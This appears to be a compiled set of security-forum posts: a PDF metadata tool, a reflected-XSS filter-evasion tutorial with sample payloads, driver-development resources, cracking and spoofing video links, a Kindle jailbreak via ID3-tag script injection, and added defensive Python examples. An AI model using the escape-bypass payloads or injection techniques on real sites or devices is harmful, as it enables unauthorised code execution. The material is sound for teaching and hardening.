Source: Metagoofil Backtrack 5 Tutorial-Metadata Analyzer Information Gathering Tool | Ethical Hacking-Your Way To The World Of IT Security
-
[h=1]PDFMiner[/h]
Python PDF parser and analyzer

[h=2]What's It?[/h]

PDFMiner is a tool for extracting information from PDF documents. Unlike other PDF-related tools, it focuses entirely on getting and analyzing text data. PDFMiner allows one to obtain the exact location of text in a page, as well as other information such as fonts or lines. It includes a PDF converter that can transform PDF files into other text formats (such as HTML). It has an extensible PDF parser that can be used for other purposes than text analysis.

[h=3]Features[/h]

Written entirely in Python. (for version 2.4 or newer)
Parse, analyze, and convert PDF documents.
PDF-1.7 specification support. (well, almost)
CJK languages and vertical writing scripts support.
Various font types (Type1, TrueType, Type3, and CID) support.
Basic encryption (RC4) support.
PDF to HTML conversion (with a sample converter web app).
Outline (TOC) extraction.
Tagged contents extraction.
Reconstruct the original layout by grouping text chunks.

PDFMiner is about 20 times slower than other C/C++-based counterparts such as XPdf.

Online Demo: (pdf -> html conversion webapp) http://pdf2html.tabesugi.net:8080/

[h=3]Download[/h]

Source distribution: http://pypi.python.org/pypi/pdfminer/
github: https://github.com/euske/pdfminer/

[h=3]Where to Ask[/h]

Questions and comments: http://groups.google.com/group/pdfminer-users/

Details: http://www.unixuser.org/~euske/python/pdfminer/index.html
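For both the Metagoofil post above (what the author, creator and path fields of a public document give away) and the PDFMiner post (a PDF parser), an added example that is neither tool's own code: a minimal parser for the PDF /Info dictionary, run over a constructed sample PDF so it works offline. It only understands literal strings in an uncompressed /Info object; hex strings and object streams are out of scope.

```python
"""Added example (not metagoofil's or PDFMiner's code): extract the /Info
dictionary of a PDF, the place where documents leak authors, software and
local paths, and summarise what an auditor would flag before publishing."""
import re

# Constructed sample: a minimal but well-formed PDF whose /Info dictionary
# carries the kind of fields public documents commonly leak.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
    b"3 0 obj\n<< /Author (jsmith)\n"
    b"   /Creator (Microsoft\\251 Word 2010)\n"
    b"   /Title (Microsoft Word - C:\\\\Users\\\\jsmith\\\\Documents\\\\report.docx)\n"
    b"   /Producer (Acrobat Distiller 9.0 \\(Windows\\)) >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R /Info 3 0 R >>\n%%EOF\n"
)

_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
            b"(": b"(", b")": b")", b"\\": b"\\"}


def decode_literal(raw: bytes) -> str:
    """Decode the body of a PDF literal string (text between parentheses)."""
    out = bytearray()
    i = 0
    while i < len(raw):
        c = raw[i:i + 1]
        if c != b"\\":
            out += c
            i += 1
            continue
        nxt = raw[i + 1:i + 2]
        m = re.match(rb"[0-7]{1,3}", raw[i + 1:i + 4])
        if m:                            # octal escape such as \251
            out.append(int(m.group(), 8))
            i += 1 + len(m.group())
        elif nxt in _ESCAPES:
            out += _ESCAPES[nxt]
            i += 2
        else:                            # unknown escape: drop the backslash
            out += nxt
            i += 2
    return out.decode("latin-1")         # PDFDocEncoding is close enough here


def info_dictionary(pdf: bytes) -> dict:
    """Return the /Info dictionary's literal-string entries as {key: value}."""
    ref = re.search(rb"/Info\s+(\d+)\s+(\d+)\s+R", pdf)
    if not ref:
        return {}
    num, gen = ref.group(1), ref.group(2)
    obj = re.search(rb"(?<!\d)" + num + rb"\s+" + gen + rb"\s+obj(.*?)endobj",
                    pdf, re.S)
    if not obj:
        return {}
    entries = {}
    # /Key (value) pairs; "\\." keeps escaped parentheses inside the value
    for key, val in re.findall(rb"/(\w+)\s*\(((?:\\.|[^\\()])*)\)",
                               obj.group(1), re.S):
        entries[key.decode("latin-1")] = decode_literal(val)
    return entries


WINDOWS_PATH = re.compile(r"[A-Za-z]:\\[^\s\"']+")
POSIX_PATH = re.compile(r"(?<![\w/])/(?:Users|home)/[^\s\"']+")


def metadata_audit(pdf: bytes) -> dict:
    """Summarise what the document discloses: usernames, paths, software."""
    info = info_dictionary(pdf)
    paths = []
    for value in info.values():
        paths += WINDOWS_PATH.findall(value) + POSIX_PATH.findall(value)
    users = {info[k] for k in ("Author", "LastModifiedBy") if k in info}
    for p in paths:                      # usernames also hide in profile paths
        um = re.search(r"(?:\\Users\\|/Users/|/home/)([^\\/]+)", p)
        if um:
            users.add(um.group(1))
    return {
        "usernames": sorted(users),
        "paths": paths,
        "software": [info[k] for k in ("Creator", "Producer") if k in info],
    }


if __name__ == "__main__":
    print(metadata_audit(SAMPLE_PDF))
```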
-
[h=1]Escaping Escapes[/h]
April 20, 2011 By Justin Barron 2 Comments

Sometimes a server will escape special characters that are injected. For instance, injecting a " character and having it reflect as \":

Injection: xss"
Reflection:
[INDENT]x="[U][B]xss[/B][/U]\[U][B]"[/B][/U]";y=42; [/INDENT]

Fail.

Sometimes, ironically enough, you can outsmart filters by using their own tricks against them. Try escaping their escape character like this:

Injection: xss\"
Reflection:
[INDENT]x="[U][B]xss\[/B][/U]\[U][B]"[/B][/U]";y=42; [/INDENT]

Success!

However, if the server escapes your injected \ as \\, this technique will not work:

Injection: xss\"
Reflection:
[INDENT]x="[U][B]xss[/B][/U]\[U][B]\[/B][/U]\[U][B]"[/B][/U]";y=42; [/INDENT]

Not fun.

If you’re able to break out by escaping their escape, you’ll need to blend back in with something other than a ", because the escaping process breaks the syntax:

Injection: xss\"*alert(1)*\"
Reflection:
[INDENT]x="[U][B]xss\[/B][/U]\[U][B]"*alert(1)*\[/B][/U]\[U][B]"[/B][/U]";y=42; [/INDENT]

The *\\ following alert(1) is not valid syntax and will cause an error. So…

Injection: xss\"*alert(1)//
Reflection:
[INDENT]x="[U][B]xss\[/B][/U]\[U][B]"*alert(1)//[/B][/U]";y=42; [/INDENT]

Commenting out the rest is your best bet, unless they escape your // like \/\/. When this happens, I don’t think there’s much you can do.

Escaping escapes reminds me of the classic movie moment, when a bad guy gets the drop on a good guy, but then another good guy gets the drop on the bad guy. It always cracks me up when this evasion technique works.

Source: https://blog.whitehatsec.com/escaping-escapes/
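The filter behaviour from the post, as an added Python example that is not the post's own code: a small scanner that finds where a browser would end the `x="..."` literal, used to compare a filter that escapes only `"` with one that escapes `\` first (and with `json.dumps`, which does the same). The function names, the template and the weak filter are constructed for the demo.

```python
"""Added example (not from the post): why escaping the quote alone fails and
escaping the backslash first does not. A tiny scanner plays the browser's
role and reports where the double-quoted JS literal really ends."""
import json

TEMPLATE = 'x="{}";y=42;'  # the reflection point shown in the post


def weak_escape(value: str) -> str:
    """Constructed filter that only turns a quote into an escaped quote."""
    return value.replace('"', '\\"')


def strong_escape(value: str) -> str:
    """Escape the backslash before the quote, so an injected backslash can
    no longer swallow the backslash the filter adds in front of the quote."""
    return value.replace("\\", "\\\\").replace('"', '\\"')


def json_escape(value: str) -> str:
    """Same property via the standard library; json.dumps escapes both the
    backslash and the quote (the surrounding quotes are stripped here)."""
    return json.dumps(value)[1:-1]


def string_literal_end(js: str, start: int) -> int:
    """Index of the quote closing the literal that opens at `start`,
    applying the JS rule that a backslash escapes the next character."""
    i = start + 1
    while i < len(js):
        if js[i] == "\\":
            i += 2                      # an escaped char can never close it
            continue
        if js[i] == '"':
            return i
        i += 1
    raise ValueError("unterminated string literal")


def breaks_out(escaper, payload: str) -> bool:
    """True when the reflected payload closes the literal early, i.e. part
    of the attacker-controlled text is parsed as code instead of data."""
    reflected = escaper(payload)
    js = TEMPLATE.format(reflected)
    opening = js.index('"')
    expected_close = opening + 1 + len(reflected)  # the template's own quote
    return string_literal_end(js, opening) != expected_close


def compare_filters(payload: str) -> dict:
    """Outcome of the same payload under each filter."""
    return {name: breaks_out(fn, payload)
            for name, fn in (("weak", weak_escape),
                             ("strong", strong_escape),
                             ("json", json_escape))}


if __name__ == "__main__":
    for p in ('xss"', 'xss\\"', 'xss\\"*alert(1)//'):
        print(repr(p), compare_filters(p))
```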
-
Device Driver Development for Beginners - Reloaded
by Evilcry » Mon Oct 04, 2010 6:14 am

Hi,

This is just a little starter for people interested in starting Kernel-Mode Development. By following a good thread on UIC forum, opened by a beginner that wanted to know how to start with Device Driver Development, I remembered that a long time ago I published a similar blog post on that subject. Now I'm going to Reload and Expand it.

Development Tools

1. WDK/DDK - this is the proper Driver Development SDK given by Microsoft, latest edition can be downloaded http://www.microsoft.com/whdc/DevTools/WDK/WDKpkg.mspx
2. Visual Studio 2008/2010 - you can also develop without VS, but I always prefer all the Comforts given by such an advanced IDE, especially in presence of complex device drivers.
3. DDKWizard - DDKWizard is a so-called project creation wizard (for VisualStudio) that allows you to create projects that use the DDKBUILD scripts from OSR (also available in the download section from this site). The wizard will give you several options to configure your project prior to the creation. You can download it http://ddkwizard.assarbad.net/
4. VisualAssist - (Optional Tool) Visual Assist X provides productivity enhancements that help you read, write, navigate and refactor code with blazing speed in all Microsoft IDEs. You can Try/Buy it http://wholetomato.com/
5. VisualDDK - Develop and Debug drivers directly from VS, enjoy debugging your driver directly from Visual Studio, speeding up debugging ~18x for VMWare and ~48x for VirtualBox. Download and Step by Step Quick Start Guide http://visualddk.sysprogs.org/quickstart/
6. Virtual Machine - You need a Virtual Machine to perform efficient Driver Debugging, best options are VMWare or VirtualBox.

Building a Driver Development Environment

As you can see, a good comfortable Driver Development station is composed of a good amount of components, so we need an installation order.

1. Install your IDE - VisualStudio2008 or VisualStudio2010
2. Install WDK package
3. Install DDKWizard
4. Download and place ( usually into C:\WinDDK ) ddkbuild.cmd
5. By following the DDKWizard pdf you will be driven to add a new Environment Variable directly related to the OS version in which you are developing and successively add a reference of ddkbuild.cmd into the VS IDE. The DDKWizard Manual is very well written.
6. After finishing DDKWizard integration you can test if your environment is correctly installed, by compiling your first driver. Steps are easy: open VS and select the DDKWizard template (not EmptyDriver), you will see the skeleton of a Driver, all you have to do is Build Solution and verify that no Compiling Errors occur; your station is correctly installed.
7. Install VirtualMachine
8. Integrate Debugging help of VisualDDK by following the step by step quick start guide
9. Install Visual Assist (this can be done at any moment after VS Installation)

Additional Tools

* DeviceTree - This utility has two views: (a) one view that will show you the entire PnP enumeration tree of device objects, including relationships among objects and all the device's reported PnP characteristics, and (b) a second view that shows you the device objects created, sorted by driver name. There is nothing like this utility available anywhere else. Download it http://www.osronline.com/article.cfm?article=97
* IrpTracker - IrpTracker allows you to monitor all I/O request packets (IRPs) on a system without the use of any filter drivers and with no references to any device objects, leaving the PnP system entirely undisturbed. In addition to being able to see the path the IRP takes down the driver stack and its ultimate completion status, a detailed view is available that allows you to see the entire contents of the static portion of the IRP and an interpreted view of the current and previous stack locations. Download it http://www.osronline.com/article.cfm?article=199
* DebugMon - Displays DbgPrint messages generated by any driver in the system (or the OS itself) in the application window. Can be used either in local mode or can send the DbgPrint messages to another system via TCP/IP. Download it http://www.osronline.com/article.cfm?article=99
* DriverLoader - This GUI-based tool will make all the appropriate registry entries for your driver, and even allow you to start your driver without rebooting. It's even got a help file, for goodness sakes! If you write drivers, this is another one of those utilities that's a must have for your tool chest. x86 architecture. Download it http://www.osronline.com/article.cfm?article=157

Now you have a full working Develop and Debug Station. As you should imagine, dealing with driver development implies working in Kernel Mode, a task pretty challenging, delicate and complex. A badly written driver leads to OS Crash and/or dangerous bugs; just think about a driver used in mission-critical applications like Surgery, where a bug or a crash could lead to extremely big dangers.

The driver needs to be:

* Bug Free
* Fault Tolerant
* Ready to Endure all Stress Situations

This could be done, only by the driver coder, with a large knowledge of the following fields:

* Hardware Architecture
* Operating System Architecture
* Kernel and User Mode Architecture
* Rock Solid C language knowledge
* Debugging Ability

Here I'm going to enumerate the Documentation/Books/Etc. necessary to achieve a *good and solid* background and advanced knowledge about driver coding.

Microsoft WDK Page: http://www.microsoft.com/whdc/devtools/WDK/default.mspx

Will give you information about:

1. WDM ( Windows Driver Model)
2. WDF (Windows Driver Foundation)
3. IFS Kit (Installable FileSystem Kit)
4. Driver Debugging
5. Driver Stress Testing ( DriverVerifier tool )

PC Fundamentals: http://www.microsoft.com/whdc/system/default.mspx
Device Fundamentals: http://www.microsoft.com/whdc/device/default.mspx

This will give you a large view of 'what developing a driver means', which components are touched and which aspects you need to know.

It's also obviously necessary to have a Reference about the kernel mode Functions and Mechanisms involved; the first best resource is always MSDN, here is the starter link to follow MSDN->DDK http://msdn.microsoft.com/en-us/library ... 85).aspx

How to start Learning

As pointed out in the previous blog post, one of the best starting points, that will give you an on-the-fly view of development topics, is the Toby Opferman set of articles:

Driver Development Part 1: Introduction to Drivers http://www.codeproject.com/KB/system/driverdev.aspx
Driver Development Part 2: Introduction to Implementing IOCTLs http://www.codeproject.com/KB/system/driverdev2.aspx
Driver Development Part 3: Introduction to driver contexts http://www.codeproject.com/KB/system/driverdev3.aspx
Driver Development Part 4: Introduction to device stacks http://www.codeproject.com/KB/system/driverdev4asp.aspx
Driver Development Part 5: Introduction to the Transport Device Interface http://www.codeproject.com/KB/system/driverdev5asp.aspx
Driver Development Part 6: Introduction to Display Drivers http://www.codeproject.com/KB/system/driverdev6asp.aspx

It's really important to put in evidence MemoryManagement at KernelMode; the best starting point for these aspects are the tutorials written by four-f: http://www.freewebs.com/four-f/

Handling IRPs: What Every Driver Writer Needs to Know http://download.microsoft.com/download/ ... a/IRPs.doc

Book Resources

Tutorials are a great starting point, but a solid understanding is given by a set of 'abstracts'; hence the necessity of a good Book Collection:

Windows NT Device Driver Development (OSR Classic Reprints) http://www.amazon.com/Windows-Device-De ... 242&sr=8-2
Windows-Internals-Including-Windows-PRO-Developer http://www.amazon.com/Windows®-Int ... 160&sr=8-1
The Windows 2000 device driver book: a guide for programmers http://www.amazon.com/Windows-2000-Devi ... 0130204315
Windows NT/2000 Native API Reference http://www.amazon.com/Windows-2000-Nati ... 201&sr=8-1
Undocumented Windows 2000 Secrets http://undocumented.rawol.com/
Developing Drivers with WDF http://www.microsoft.com/whdc/driver/wdf/wdfbook.mspx
Windows NT File System Internals, A Developer's Guide http://oreilly.com/catalog/9781565922495

Web Resources

The first and most important resource about Windows Driver Development is OSROnline: http://www.osronline.com/

I strongly suggest you to subscribe to:

1. The NT Insider
2. NTDEV MailingList
3. NTFSD MailingList

NDIS Developer's Reference http://www.ndis.com/
Information, Articles, and Free Downloads http://www.hollistech.com/resources.htm
The Undocumented Functions http://undocumented.ntinternals.net
Blog MSDN http://blogs.msdn.com/iliast
Windows Vista Kernel Structures http://www.nirsoft.net/kernel_struct/vista/
Peter Wieland's thoughts on Windows driver development http://blogs.msdn.com/b/peterwie/
USB Driver Development http://blogs.msdn.com/b/usbcoreblog/
Hardware and Driver Developer Blogs http://www.microsoft.com/whdc/resources/blogs.mspx

Developer Newsgroups

• microsoft.public.development.device.drivers
• microsoft.public.win32.programmer.kernel
• microsoft.public.windbg

KernelmodeInfo Blog
CURRENT_IRQL
j00ru//vx tech blog Coding, reverse engineering, OS internals Blog http://j00ru.vexillium.org/
Nynaeve http://www.nynaeve.net/
DumpAnalysis Blog http://www.dumpanalysis.org/
Analyze -v Blog http://analyze-v.com/
Instant Online Crash Dump Analysis http://www.osronline.com/page.cfm?name=analyze
Winsock Kernel (WSK) http://msdn.microsoft.com/en-us/library/ff571084.aspx
Transport Driver Interface (TDI) http://msdn.microsoft.com/en-us/library/ms819740.aspx
Network Driver Interface Specification (NDIS) http://blogs.msdn.com/b/ndis/
System Internals http://www.microsoft.com/whdc/system/Sysinternals/default.mspx

Driver development needs too much time, patience and experience to be fully understood; in my opinion the best approach remains LbD ( Learning by Doing ), so read, study and develop: the more experience you build, the fewer BSODs and "strange behavior" you will obtain.

See you at the next post,
Giuseppe 'Evilcry' Bonfa
-
Unfortunately they are in Spanish, but they may be useful to you:

BackTrack 5 sacar claves wep WIFI (HD) http://www.youtube.com/watch?v=aUqeynUsRHQ
BackTrack 5 claves wep con Filtrado MAC (HD) http://www.youtube.com/watch?v=MEwLAWoE7VY
BackTrack 5 claves WPA (HD) Part 1 http://www.youtube.com/watch?v=NCU65dolhI0
BackTrack 5 claves WPA (HD) Part 2 http://www.youtube.com/watch?v=yFOehkT-CNE

Source: Videos de Cracking WEP Y WPA Backtrack 5 Español
-
Web Services Hacking and Hardening
Adam Vincent, Sr. Federal Solutions Architect

The following presentation will NOT be a vendor Pitch but will hopefully educate the audience in Web Services Hacking, Testing, and Hardening Techniques. Real life examples may be offered that relate to deployment of Layer 7 Technologies product line. Hardening of Web Services will have some focus on technologies like those Layer 7 Technologies provides. Layer 7’s product will be used as an example in this portion of the presentation.

•Components and Terminology
•Web Services Threats
•Web Services Hacking
•Web Services Hardening
•Conclusion and Questions

Download: https://www.owasp.org/images/d/d0/Web_Services_Hacking_and_Hardening.pdf
-
[h=4]Dns Spoofing With Ettercap Cli[/h]

Description: Download Video Good Resolution from Mediafire : http://adf/.ly/4A0QY (10.25 MB)

Source: [Xhabie-Crew] Dns Spoofing With Ettercap Cli
-
[h=4]Social Engineering Toolkit Megaprimer Part 1[/h]

Description: In this opportunity I want to start a new series of video tutorials about the Social Engineering Toolkit, trying to cover the most important or used modules. This video will give an introduction to some concepts related to social engineering and the basics of this toolkit.

Source: Social Engineering Toolkit Megaprimer Part 1
-
[h=2]Kindle Touch (5.0) Jailbreak/Root and SSH[/h][h=3]December 10, 2011[/h][h=3]Yifan Lu @ 1:32 am[/h]

So long story short, we can run custom code on the Kindle Touch now but because the operating system has changed so much from Kindle 3, most Kindle modifications will not run without changes. I hope developers will jump to this device now that it’s unlocked. See the bottom of the post for download links. The directions for using are in the readme. Keep reading for technical details on how this came about.

Obtaining the root image

Before we can look for vulnerabilities in the system that would allow us to break in, we need to break into the system and obtain the files that might contain vulnerabilities. Yes, this is a chicken-and-egg problem, but fortunately Amazon is nice enough to help us with this. On every Kindle device is a TTL serial port. I found this port on the bottom of the device when the cover is opened. Fortunately, I did not even have to mess with it, as hondamarlboro and ramirami both managed to get the dump before me. Once we have the root image, it was only a matter of painstakingly looking through all the files to see possible injection vectors.

Looking for the needle

At first, I was digging deep into the system, disassembling and mapping out various native libraries, looking for stack overflows (I found a couple but none could be accessed efficiently). I found the bootloader was unlocked but it would be a pain and danger for users (and even developers) to flash custom kernels and such. I also found that the Java code (the Kindle’s entire GUI is written in Java) is NOT obfuscated (which means it would be easier to reverse and later modify) and Amazon has left in many places to place plugins. For example, once someone has the time to figure things out, it would be very possible to write a EPUB extension to read EPUBs from the native reader. There are some other hidden secrets in the device too. The Kindle Touch has an accelerometer and proximity sensor (and a mic, but we know that) but they aren’t used in the software (yet).

The more I looked into the system, I was aware that because it was such a huge rewrite, I had misjudged when I assumed that it would be harder to break as Amazon had years to fix the holes now. In fact, I would say that the Kindle 4 is more secure until I found out that Amazon left in SSH in diagnostics mode. Anyways, as I searched up the complexity chain from the bootloader to the kernel to the libraries to the Java interface, I found something very curious. Much of the operating system is no longer written in Java, but is now in HTML5 and Javascript. In fact, many of the interfaces on the Touch are actually web pages in disguise. For example: the password entry screen, the search bar, the browser (is just an HTML page with a frame), the Wifi selection screen, and even the music player. Obviously, these can’t all run natively in HTML and JS, or the device will be even slower (and it is pretty damn slow). What Amazon did is write a couple of Javascript hooks that are implemented by native libraries and events are read by these libraries and they perform actions accordingly. In short, Javascript will run native code. This is a goldmine, there could be many possible ways of using this to our advantage. There could be buffer overflows, heap overflows, string formatting bugs, etc. However, I didn’t have to look through much before I found a curious function: nativeBridge.dbgCmd();. It seems too good to be true. This function takes any shell command, and runs it (as root). Yup. The web browser will run as root, any command given to it. Don’t go looking for remote code execution yet (although it is highly possible), as the native bridge seems to be disabled when in web browser mode (it may be able to be bypassed, but I haven’t looked into it).

Calling the debug function

So the normal browser (as the one you can enter URLs into) can’t make use of this native bridge. However, as I’ve mentioned, a large part of the GUI in the Kindle Touch is HTML and JavaScript. All we need to do is inject some HTML into one of these and we would be all set. We need something that takes input and displays it to the user. The first thing I thought of was the media player. The Kindle displays the song title, artist, and album name in the music player, so what if we put some HTML into the ID3 tag? Yup, it works. How about some javascript? Running. Let’s try to call the debug function. It works. Well, that was a freebie.

Having some fun

That was a bit too easy and I was disappointed that I didn’t get to talk about how I whipped out IDA Pro and did some master debugging. So, let’s make things harder. We can use a MP3 with custom ID3 tags to execute any command, but how can we make this into a cool one-click solution? First of all, we should limit ourselves to one file to copy. Why make the user keep track of MP3s and shell scripts and where to put them? I took the shell script payload (which installs a developer key into the device so custom packages can be installed) and placed it into the comments section of the ID3 tag in the MP3. Then I used “dd” to extract the script, chmod it, and execute it. Now, another problem in terms of user friendliness is how to let the user know that the process was successful? I quickly whipped up an awesome looking “splash screen” and planned on displaying it while the magic is taking place. At first I tried to encode it into a variable in the shell script payload and extract it, but it was too slow and memory intensive. Instead, I took the image, raw, and appended it into the end of the MP3 (after all, the file was a bit too small). You can see the result in the video attached.

What’s next?

Just because the device is jailbroken does not mean it can now magically do anything you want. What needs to happen first is that developers need to take the device and write some code for it. This first jailbreak is really for these developers. For regular users, the only use is to preemptively unlock your device now in case the method is patched in an update or something. No mods for older Kindles will work as-is on the Touch. I’ve included a VERY basic usbnetwork package that will allow you to have SSH access to the device. I think that’s as good of a starting point as anything. From there, developers should be able to rip the root filesystem, test modifications, and write useful tweaks. (And in case of a brick, read my previous post on the bootloader access). Some things I would have to see or do is GUI plugins in the device’s operating system. The Java code is easy to decompile and read as the variable names have not been stripped out (like previous models). Hopefully people can write some reader plugins (like X-Ray) or even format plugins for other ebook formats. Being a touch screen device, one could also write games or useful apps (although the speed and eink are limiting). I need to finish writing the update creation tool so developers can package their modifications.

Download

Download the jailbreak here
Simple custom screensaver mod

Demonstration

Source: Yifan Lu | Kindle Touch (5.0) Jailbreak/Root and SSH
-
[h=1]DIY: Create multi-boot USBs with ease[/h]
By Jack Wallen December 10, 2011, 10:30 PM PST

Takeaway: Get instructions on how to use XBoot or UNetbootin to have a USB stick with more than one operating system.

When you want to have a single USB stick with multiple operating systems, the end result must be a reliable USB drive that contains the operating systems you need. Here’s how to do this with two tools: XBoot (using Windows 7) and UNetbootin (from within Linux). Both are simple, but the Linux version requires more manual work.

[h=2]XBoot in Windows 7[/h]

Requirements
XBoot
ISOs of the operating systems you want

Instructions
Download and run XBoot on your Windows 7 machine. To run XBoot, just unzip the downloaded file, change into the newly created directory, and double-click the .exe to run the software. When you run the software, you will see the main window (Figure A).

Figure A
[h=6]The operating systems listed will not show up on your XBoot window unless you installed them.[/h]

To add ISO images, open Explorer and drag and drop the ISOs into XBoot. Some ISO images (e.g., Fedora 16) are automatically recognized. When you drag an unrecognized ISO into XBoot, a new window will appear (Figure B) where you must select the ISO (or the closest distribution) from a drop-down. For example, I selected Ubuntu for Bodhi Linux and Puppy Linux for MacPup. After you select the correct version from the drop-down, click Add This File.

Figure B
[h=6]XBoot window when you drag an unrecognized ISO into it.[/h]

After all ISOs are added (make sure their combined size does not exceed that of the USB drive), click the Create USB button near the bottom right corner of the main window. Once this completes the process, you can reboot the machine (making sure it will boot from a USB device) and enjoy your multiboot on a stick.

[h=2]UNetbootin from within Linux[/h]

Requirements
UNetbootin
ISOs to be installed

Instructions
Download the UNetbootin tool for Linux. From a terminal window, give the downloaded file executable permissions with the command chmod u+x unetbootin-linux-XXX (where XXX is the architecture). Run UNetbootin with the command ./unetbootin-linux-XXX (where XXX is the architecture). From the main window, select the distribution you want to install or use a downloaded ISO. After UNetbootin completes the install of the first OS, reboot the machine to test the OS on the USB drive.

Now it gets a little tricky. You must copy everything from the USB drive to a new directory on your hard drive. Then, repeat the steps above, selecting the next OS you want on the USB drive. Now open two file manager windows: one to the USB drive and one to the newly created directory containing all the files from the first install you did on UNetbootin. You want to copy everything from the hard drive to the USB drive except the following:

vesamenu.c32
ubnpathl.txt
ubnkern
ubninit
ubnfilel.txt
syslinux.cfg
ldlinux.sys

In the folder on your desktop, you must open the syslinux.cfg file. From that file, copy the last four lines and paste them in the syslinux.cfg file on the USB drive. Those lines will look like this:

[INDENT]label ubnentry0
menu label DISTRIBUTION
kernel /vmlinuz
append initrd=/initrd.gz pmedia=cd[/INDENT]

where DISTRIBUTION is the name of the distribution you originally installed. You must copy the above four lines between the “label ubnentry1” and “label ubnentry2” entries. Make sure to relabel the “ubnentryX” entries so they are in consecutive numerical order. After you make the necessary edits, close and save the file and reboot the system. You should now have a multi-boot USB drive that is in working order.

With a large enough USB drive, you can carry around any number of operating systems that serve numerous purposes.

Source: DIY: Create multi-boot USBs with ease | TechRepublic
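The syslinux.cfg merge from the UNetbootin steps, as an added Python helper that is neither TechRepublic's nor UNetbootin's code: it takes the last four lines of the saved config, inserts them before `label ubnentry2` in the USB config, and renumbers every ubnentryN label consecutively. Both config texts are constructed samples, not real UNetbootin output.

```python
"""Added example (not from the article or UNetbootin): automate the manual
syslinux.cfg edit at the end of the multi-boot procedure. It only edits the
menu file; the kernel/initrd files named by the entry still have to be copied
to the USB drive by hand, as the article describes."""
import re

LABEL_RE = re.compile(r"^(label\s+ubnentry)(\d+)\s*$")

# Constructed sample: the syslinux.cfg UNetbootin wrote for the SECOND OS,
# as found on the USB stick after the second install.
USB_CFG = """default menu.c32
prompt 0
menu title UNetbootin
timeout 100

label ubnentry0
menu label ^Bodhi Linux
kernel /ubnkern
append initrd=/ubninit

label ubnentry1
menu label ^Bodhi Linux (text mode)
kernel /ubnkern
append initrd=/ubninit text

label ubnentry2
menu label ^Memory test
kernel /ubnkern
append initrd=/ubninit memtest
"""

# Constructed sample: the syslinux.cfg saved to the hard drive after the
# FIRST install; the article tells you to copy its last four lines.
SAVED_CFG = """default menu.c32
prompt 0
menu title UNetbootin
timeout 100

label ubnentry0
menu label Puppy Linux
kernel /vmlinuz
append initrd=/initrd.gz pmedia=cd
"""


def last_entry(saved_cfg: str) -> list:
    """The four lines (label, menu label, kernel, append) at the end of the
    saved config, exactly the block the article says to copy."""
    lines = saved_cfg.rstrip("\n").split("\n")
    entry = lines[-4:]
    if len(entry) < 4 or not LABEL_RE.match(entry[0]):
        raise ValueError("last four lines do not start with a ubnentry label")
    return entry


def merge_syslinux_entry(usb_cfg: str, saved_cfg: str) -> str:
    """Insert the saved entry before 'label ubnentry2' (at the end if there
    is no such label) and renumber the ubnentryN labels from 0 upwards."""
    entry = last_entry(saved_cfg)
    lines = usb_cfg.rstrip("\n").split("\n")
    insert_at = len(lines)
    for i, line in enumerate(lines):
        m = LABEL_RE.match(line)
        if m and m.group(2) == "2":
            insert_at = i
            break
    merged = lines[:insert_at] + entry + [""] + lines[insert_at:]

    # Relabel so the numbers run consecutively, as the article requires.
    n = 0
    out = []
    for line in merged:
        m = LABEL_RE.match(line)
        if m:
            line = "%s%d" % (m.group(1), n)
            n += 1
        out.append(line)
    return "\n".join(out) + "\n"


def entries(cfg: str) -> list:
    """(label, menu label) pairs in file order, for checking the result."""
    result = []
    current = None
    for line in cfg.split("\n"):
        if line.startswith("label "):
            current = line.split(None, 1)[1]
        elif line.startswith("menu label ") and current is not None:
            result.append((current, line[len("menu label "):]))
    return result


if __name__ == "__main__":
    print(merge_syslinux_entry(USB_CFG, SAVED_CFG))
```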